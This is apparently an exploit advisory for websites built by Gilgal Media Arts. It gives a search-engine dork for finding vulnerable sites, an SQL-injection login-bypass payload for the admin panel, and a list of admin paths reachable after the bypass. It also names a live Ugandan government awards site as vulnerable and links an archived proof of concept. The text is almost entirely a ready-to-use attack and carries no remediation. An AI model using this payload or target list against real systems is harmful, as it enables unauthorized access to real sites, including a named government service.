#################################################################################################
# Exploit Title : Designed & Powered by Gilgal Media Arts Admin Login Bypass Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 23/06/2018
# Vendor Homepage : gilgalmediaarts.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-592 [ Authentication Bypass Issues ]
#################################################################################################
# Google Dork : intext:''Designed & Powered by Gilgal Media Arts''
# Administration Login Panel => /adminlogin.php
# Exploit :
Username => '=''or'
Password => '=''or'
# Useable URL Paths in the Control Panel =>
/users.php
/beneficiaries.php
/medals.php
/personal_category.php
/celebration.php
/search.php
/search_pubaward.php
/reportsbackup.php
/searchparam.php
/searchparamdates.php
/pending.php
/downloads.html
TARGET/reportsbackuppub1.php
#################################################################################################
# Note : Only one important government website is vulnerable.
Office of the President The Republic of Uganda National Awards is Vulnerable.
# Example Site : presidentialawards.go.ug => [ Proof of Concept ] => archive.is/mlnxA
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################